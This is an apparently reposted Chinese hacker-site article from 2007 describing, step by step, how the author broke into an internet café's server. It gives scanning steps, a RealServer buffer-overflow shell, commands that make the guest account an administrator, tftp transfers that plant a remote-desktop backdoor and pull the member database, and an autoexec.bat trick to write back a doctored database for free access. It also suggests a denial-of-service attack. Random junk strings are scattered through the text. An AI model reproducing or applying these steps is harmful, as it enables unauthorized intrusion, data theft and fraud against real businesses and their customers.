如何侵入网吧服务器 - 华夏黑客同盟

| 网站首页 | 资讯 | Hack | 漏洞 | 网管 | 编程 | 培训 | 品黑页 | 软件 | 论坛 | 动画 | 视频 | 经典 | 教学站 | 黑客点睛 |

服务导航

我要发布

主力频道

精华收集

光盘刻录

您现在的位置：华夏黑客同盟 >> Hack >> 脚本漏洞攻击 >> 正文

用户登录

新用户注册

如何侵入网吧服务器

热 ★★★

【字体：小大】

如何侵入网吧服务器

作者：不详文章来源：华盟收集点击数：更新时间：2007-7-18

    如何侵入网吧服务器(以前的原创贴...无意间打开网盘找到的~~~)

    一直有写些东西的冲动，只是太懒，从前写些在网吧免费上网的东东，现在想想是该换些别的。有些东 , 6{USeP
西放了太久很容易过时的。本文所提及的工具都可以在网上找到。
Gi9d]L
一、确定目标 ;Rg TCd
　首先要确定要攻击的目标，即网吧服务器的IP是多少。我所在网吧的客户机装的是Windows 98+万象 cqLHNEGh
2003，估计服务器应该是Windows 2k以上，用Superscan 3.0扫了一下192.168.0.1~192.168.0.254这个 zuPP7s0x
范围的135端口，只有一个结果，往服务台瞅了一眼，确实只有一台服务器没有错，目标确定。 $~2nV

二、开始入侵 4=!oVw1
　既然服务器开了135端口，那么先用RPC服务缓冲区溢出漏洞溢出工具“RPC Exploit GUI”试试看，选择目标为win2k（ALL）和winxp（ALL）都没有成功，或许是打了补丁，也可能是借助天网防火墙之类的对135端口做了限制。打开Superscan，扫了一下192.168.0.100（刚才扫出的服务器内部IP地址）的 “1~500”端口，结果显示服务器开了21（ftp），80（http），135（Location Service），139 （NetBIos），445（Microsoft-DS）端口，在IE地址栏内输入"ftp://192.168.0.100",有个共享目录Backup，打开浏览了一遍，东西挺多，只是有个万象2003的安装程序让我不至于太失望。

    返回Superscan，可以看到结果栏里显示服务器用的是IIS5.1，可以确定目标服务器用的是Windows XP，看来用Webdavx溢出XP的机子是没希望了，用X-scan扫描服务器网页，报告发现.idq/.ida映射的溢出漏洞。骗人的。其实对于IIS5.1无效，想过利用X-way穷举目标服务器的密码，但是很费时，我没有太多时间，便放弃了。又试着对服务器的fp30reg.dll进行溢出。由于对方防火墙的阻挡，测试失败。
.Z;9 @,":R
      Win98的客户机实在不能利用目标服务器的139端口做些什么。用“RPC Exploit GUI”溢出服务器的 139、445端口的成功率太低。先冷静一会儿，满着看目标服务器的网站做的如何，随便点了一会儿，是个利用RealPlayer播放的在线电影网站，想起来了，该服务不是开了个554（媒体流）端口嘛！ Ergc

    刚才用Superscan扫描时忘了，现在补充确认一下。再用real服务缓冲区溢出漏洞溢出工具"THCREALbad" AC3u试试。这个漏洞不是很著名，管理员有可能不知道，我心里想着，一会儿，提示溢出成功，并要求我连接到其31337端口，我终于看到了曙光，telnet上去，成功获得服务器的shell。
先做个账号，这要用到几条命令：（括号内为注解，不要输入） >w!R+#*iyF
net user guest /active:yes（启用账户guest） :_B~Os
net user guest 12345（把账户guest的密码设为12345） V*uO{x
net localgroup administrators /add guest（把账户guest加到administrators组，具有最高权限，默认为Guests组） J*Wmf2%f
    由于服务器用的是WinXP，因此映射网络驱动器的方法是不行了，下载TFTPD32并运行（自己去网上找），
把本地变成一台FTP服务器，FTP目录设为C盘根目录，下载djxyxs.exe（开3389用的）到C盘根目录 #(484U
（FTP目录设在哪里就下载到哪里）。

     回到溢出shell，把djxyxs.exe传到服务器，执行“tftp -i 192.168.0.50 get djxyxs.exe C:windowssystemdjxyxs.exe（注：192.168.0.50为本地机），传过来了，再执行“djxyxs”程序，对方的3389端口就要开了（还要重启），后门制作好了以后，来窃取服务器的会员数据库(这是本文的重点)，服务端一般是被装在C盘的Octopus目录下，执行“tftp -i 192.168.0.50 put Oct2003.mdb c:octopusOct2003.mdb”（注：oct2003.mdb为万象2003的会员数据库），一盏茶的功夫（视数据库的大小而定），数据库下载过来了，但是怎么打开呢？可以用Excel，但网吧里不会装这种玩意，记得服务器的共享目录Backup里有个万象2003的安装程序（在“百度”搜索“万象2003”可以找到），把它的服务端装到本机D盘根目录，用刚刚下载到C盘的Oct2003.mdb覆盖掉本机“D:Octopus”目录里的空数据库文件，再运行服务端程序“server.exe”可以看到本网吧的所有会员，接下来是自己添加会员，没什么好说的，可别告诉我你不会。再着是要把修改后的数据库文件传回来，由于服务器的万象服务端是开着的，为避免发生冲突，切不可把修改过的数据库文件直接传到目标的octopus目录，要换一种方法，让服务器在重新启动过程中替换掉那两个文件，方法如下：

1、编辑本机的autoexec.bat（在C盘的根目录），删掉所有内容。 l}}CEBDE
2、输入以下内容：（括号内为解释，不要输入） ^anV
lO=y %6e
@echo off（关闭屏幕回显） W2<47M;EN
move c:Oct2003.mdb c:Octopus（将本机C盘的数据库文件替换掉服务器里的数据库文件） ( hmOdkkMJ
8(Q?u 5
3、回到服务器的shell，执行“tftp -i 192.168.0.50 get autoexec.bat c:autoexec.bat”（用我们的自启动文件autoexec.bat覆盖掉服务器的autoexec.bat）。 (O]4g? kle

4、最后是把修改过的数据库文件传到服务器，执行“tftp -i 192.168.0.50 get Oct2003.mdb c:Oct2003.mdb” ` >W#HP
　接下来只需叫管理员把服务器重启一下就可以了（呵呵！管理员会听你的吗？）。XP自带一个重启的 m^#dPL(/VT
命令（Shutdown），我在溢出的shell里执行“shutdown -r”后，提示“权限不够，客户机不能执行重 d" t+X
启命令”，算了吧！心急的可以来个拒绝服务攻击。本篇写的确实挺乱的，没有什么技术性可言，仅供 H9"x 9bn B
一些人参考，写得不好之处欢迎指正！

责任编辑：朱倩　　联系方式　Email：朱倩

电话：51228163

上一篇黑客：动网8.0最新漏洞

下一篇黑客：对台湾视频站点的再次渗透尝试

【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

（只显示最新5条。评论内容只代表网友观点，与本站立场无关！）

姓名：	* 游客填写　·注册用户
主页：
评分：	1分 2分 3分 4分 5分
评论内容：
验证码： *

请遵守《互联网电子公告服务管理规定》及中华人民共和国其他各项有关法律法规。严禁发表危害国家安全、损害国家利益、破坏民族团结、破坏国家宗教政策、破坏社会稳定、侮辱、诽谤、教唆、淫秽等内容的评论。用户需对自己在使用本站服务过程中的行为承担法律责任（直接或间接导致的）。本站管理员有权保留或删除评论内容。评论内容只代表网友个人观点，与本网站立场无关。

最新hack更新

最新推荐资讯

最新会员软件

最新推荐视频

最新推荐动画

mailto:webmaster@77169.net
咨询QQ号:836982 / 59280880
联系站长 QQ38588913